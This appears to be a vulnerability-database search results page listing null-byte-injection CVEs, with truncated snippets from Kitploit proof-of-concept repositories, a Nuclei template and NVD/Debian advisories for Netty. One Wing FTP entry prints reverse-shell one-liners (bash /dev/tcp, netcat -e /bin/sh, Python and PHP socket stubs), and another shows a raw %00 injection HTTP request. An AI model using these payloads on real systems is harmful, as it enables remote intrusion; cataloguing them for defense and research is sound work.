Lucene search
+L

161 matches found

Kitploit
Kitploit
added 2026/09/15 1:56 p.m.9 views

CVE-2019-17137

CVE-2019-17137 CVE信息:https://vulners.com/cve/CVE-2019-17137 POC root@kitploit: GET /index.htm%00currentsetting.htm HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.15; rv:78.0 Gecko/20100101 Firefox/78.0 Accept: / Accept-Language:...

9.4CVSS8.6AI score0.02737EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/15 1:24 p.m.7 views

CVE-2025-58440

CVE-2025-58440 Ejecución Remota de Código RCE mediante ataque de archivo políglota e inyección de byte nulo en Laravel FileManager Resumen Las versiones 2.11 del paquete unisharp/laravel-filemanager son vulnerables a Ejecución Remota de Código RCE debido a una validación inadecuada del tipo de...

6.2AI score
SaveExploits1References1
Kitploit
Kitploit
added 2026/09/15 8:10 a.m.3 views

CVE-2022-36804-POC

CVE-2022-36804-POC 🕷️ Bitbucket CVE-2022-36804 ejecución remota de comandos sin autenticación Explotación Encuentra repositorios visibles públicamente - example.com/repos?visibility=public...

8.8CVSS8.2AI score0.99174EPSS
SaveExploits25
Nuclei
Nuclei
added 2026/09/15 5:39 a.m.40 views

Control Web Panel (CWP) - File Inclusion

In CWP Control Web Panel, previously CentOS Web Panel before version 0.9.8.1107, an unauthenticated attacker can abuse null byte %00 injection with the "scripts" parameter in the /user/loader.php or /user/login.php endpoints to register arbitrary API keys or access sensitive files. This can be...

9.8CVSS8.5AI score0.70745EPSS
SaveExploits1References2
Kitploit
Kitploit
added 2026/09/15 1:15 a.m.8 views

CVE-2025-47812

CVE-2025-47812 - Wing FTP服务器远程代码执行(RCE) 作者: blindma1den 日期: 2025年7月 漏洞利用类型: 远程代码执行(未认证) 目标: Wing FTP Server & /dev/tcp/IP/PORT 0&1 Python3: python3 -c 'import socket,subprocess,os; ...' Netcat: nc IP PORT -e /bin/sh PHP: php -r '$sock=fsockopen"IP",PORT; ...'...

10CVSS8.7AI score0.92862EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/14 12:14 p.m.9 views

CVE-2025-47812-poc

CVE-2025-47812 Wing FTP Server 远程代码执行(RCE)漏洞利用工具 CVE-2025-47812 📌 致谢 :漏洞由 Julien @MrTuxracer 发现。 本 PoC 实现基于其原始研究成果。 本仓库包含针对 Wing FTP Server 远程代码执行漏洞(CVE-2025-47812) 的 Python 漏洞利用代码。该严重缺陷允许攻击者在受影响的 Wing FTP Server 实例上以 root/SYSTEM 身份实现远程代码执行,即使仅启用了匿名访问。 🚀 概述 该漏洞源于 Wing FTP Server 在认证过程中对用户名参数中的 NU...

10CVSS8.7AI score0.92862EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/14 9:23 a.m.6 views

CVE-2025-47812

CVE-2025-47812 Este es un PoC Proof of Concept del Exploit para Wing FTP Server CVE-2025-47812 Descripción Las versiones de Wing FTP Server anteriores a la 7.4.4 sufrieron una vulnerabilidad de Ejecución Remota de Código RCE como resultado del tratamiento inseguro del parámetro username. Cuando s...

10CVSS8.6AI score0.92862EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/13 7:47 p.m.6 views

CVE-2022-36804-Bitbucket-RCE-Analysis

CVE-2022-36804: Bitbucket 远程命令执行 RCE 空字节参数注入的技术分析与实验室利用 漏洞概要 CVE-2022-36804 是 Atlassian Bitbucket Server 和 Data Center 的 REST API 中的一个高危/严重 参数注入 漏洞。 虽然官方 NVD 国家漏洞数据库的基础评分为 8.8(高危) ,基于需要读取权限 PR:L 的假设,但本分析将其视为 9.8(严重) 漏洞 PR:N。如果目标仓库启用了公共访问(一种常见配置),则利用向量完全变为未经身份验证。 本仓库记录了该漏洞利用的完整链式实验室复现,直接基于 Assetno...

8.8CVSS8.2AI score0.99174EPSS
SaveExploits25
Kitploit
Kitploit
added 2026/09/11 1:26 p.m.6 views

CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC

CVE-2025-47812 — Wing FTP Server Wing FTP Server = 7.4.3 中的未授权远程代码执行漏洞。在登录时向 username 参数注入 NULL 字节会导致 Lua 代码写入会话文件。当使用生成的会话 cookie 访问 /dir.html 时,注入的代码会被执行——在 Linux 上以 root 权限,在 Windows 上以 SYSTEM 权限。 工作原理 1. 构造一个 POST 请求到 /loginok.html,在 username 字段中注入一个 NULL 字节后跟 Lua 代码。 2. 服务器创建一个包含未清理的用户名(包括 L...

10CVSS8.6AI score0.92862EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/10 4:53 a.m.7 views

CVE-2014-6287

CVE-2014-6287 - Rejetto HTTP 文件服务器 RCE 利用工具 一个用 Rust 实现的 CVE-2014-6287 漏洞利用工具,针对 Rejetto HTTP 文件服务器(HFS)2.3x 版本(低于 2.3c)。 漏洞概述 CVE-2014-6287 是 Rejetto HTTP 文件服务器(HFS)中的一个严重远程代码执行漏洞。 技术细节 受影响软件 :Rejetto HTTP 文件服务器(HFS)2.3x 版本(低于 2.3c) 漏洞类型 :远程代码执行(RCE) CVSS 评分 :10.0(严重) CWE :CWE-94(代码生成控制不当) 描述...

10CVSS8.2AI score0.99323EPSS
SaveExploits23
Kitploit
Kitploit
added 2026/09/10 4:51 a.m.8 views

CVE-2009-2265

CVE-2009-2265 - Adobe ColdFusion 8 文件上传远程代码执行 这是针对 Adobe ColdFusion 8 的 CVE-2009-2265 漏洞利用 POC 的 Rust 实现。 漏洞概述 该漏洞允许未认证的攻击者向运行 Adobe ColdFusion 8 的服务器上的 Web 可访问目录上传任意文件,从而导致远程代码执行(RCE)。 技术细节 漏洞 :通过空字节注入进行的目录遍历 组件 :FCKeditor upload.cfm 连接器 参数 :CurrentFolder 影响 :远程代码执行(RCE) 受影响软件 :Adobe ColdFusion...

7.5CVSS7AI score0.83744EPSS
SaveExploits11
Kitploit
Kitploit
added 2026/09/09 5:22 p.m.8 views

Orbit-Fox_SSRF_CVE-2025-10874

CVE-2025-10874 - Orbit Fox SSRF 概念验证 概念验证漏洞利用,演示 Orbit Fox WordPress 插件中存在的服务器端请求伪造(SSRF)漏洞,并利用空字节注入绕过。 详细博客文章:https://ryanmroth.com/articles/orbit-fox-ssrf 漏洞详情 详情| 说明 ---|--- CVE ID:| CVE-2025-10874 受影响插件:| ThemeIsle 的 Orbit Fox 漏洞类型:| 服务器端请求伪造(SSRF)(CWE-918) CVSS 评分:| 5.5(中危) 所需权限:|...

5.5CVSS5.7AI score0.00176EPSS
SaveExploits0
OSV
OSV
added 2026/08/24 8:17 p.m.6 views

DEBIAN-CVE-2026-76816

Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.137.Final and 4.2.17.Final, MqttEncoder does not validate client identifiers, will topics, usernames, and PUBLISH topic names before encoding, allowing prohibited null bytes in MQTT UTF-8 string fields and...

3.5CVSS5.4AI score0.00174EPSS
SaveExploits0References1
NVD
NVD
added 2026/08/24 8:17 p.m.11 views

CVE-2026-76816

Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.137.Final and 4.2.17.Final, MqttEncoder does not validate client identifiers, will topics, usernames, and PUBLISH topic names before encoding, allowing prohibited null bytes in MQTT UTF-8 string fields and...

3.5CVSS0.00174EPSS
SaveExploits0References3
CVE
CVE
added 2026/08/24 7:53 p.m.41 views

CVE-2026-76816

Netty , an asynchronous event-driven network framework, contains a validation bypass in its MqttEncoder prior to versions 4.1.137.Final and 4.2.17.Final . The encoder fails to validate client identifiers, will topics, usernames, and PUBLISH topic names before encoding, allowing prohibited null by...

3.5CVSS5.3AI score0.00174EPSS
SaveExploits0References3
Cvelist
Cvelist
added 2026/08/24 7:53 p.m.39 views

CVE-2026-76816 Netty: MQTT Topic Name and Client ID Validation Bypass

Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.137.Final and 4.2.17.Final, MqttEncoder does not validate client identifiers, will topics, usernames, and PUBLISH topic names before encoding, allowing prohibited null bytes in MQTT UTF-8 string fields and...

3.5CVSS0.00174EPSS
SaveExploits0References3
Debian CVE
Debian CVE
added 2026/08/24 7:53 p.m.9 views

CVE-2026-76816

Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.137.Final and 4.2.17.Final, MqttEncoder does not validate client identifiers, will topics, usernames, and PUBLISH topic names before encoding, allowing prohibited null bytes in MQTT UTF-8 string fields and...

3.5CVSS5.4AI score0.00174EPSS
SaveExploits0
NVD
NVD
added 2026/08/22 1:16 p.m.16 views

CVE-2026-62380

Netty io.netty:netty-codec-socks versions 4.2.0.Final through 4.2.16.Final and 4.1.x through 4.1.136.Final contain null byte, CRLF, and credential injection vulnerabilities in the SOCKS4 Socks4ClientEncoder and SOCKS5 Socks5ClientEncoder client encoders, which fail to validate domain address and...

7.5CVSS0.00253EPSS
SaveExploits0References2
CVE
CVE
added 2026/08/22 12:26 p.m.117 views

CVE-2026-62380

Netty (io.netty:netty-codec-socks) versions 4.1.x through 4.1.136.Final and 4.2.0.Final through 4.2.16.Final contain null byte and CRLF injection vulnerabilities in the Socks4ClientEncoder and Socks5ClientEncoder . The encoders fail to validate domain address and authentication (username/password...

7.5CVSS5.6AI score0.00253EPSS
SaveExploits0References2Affected Software1
Cvelist
Cvelist
added 2026/08/22 12:26 p.m.36 views

CVE-2026-62380 Netty before 4.2.16.Final SOCKS Proxy Null Byte Injection

Netty io.netty:netty-codec-socks versions 4.2.0.Final through 4.2.16.Final and 4.1.x through 4.1.136.Final contain null byte, CRLF, and credential injection vulnerabilities in the SOCKS4 Socks4ClientEncoder and SOCKS5 Socks5ClientEncoder client encoders, which fail to validate domain address and...

6.3CVSS0.00253EPSS
SaveExploits0References2
Rows per page
Query Builder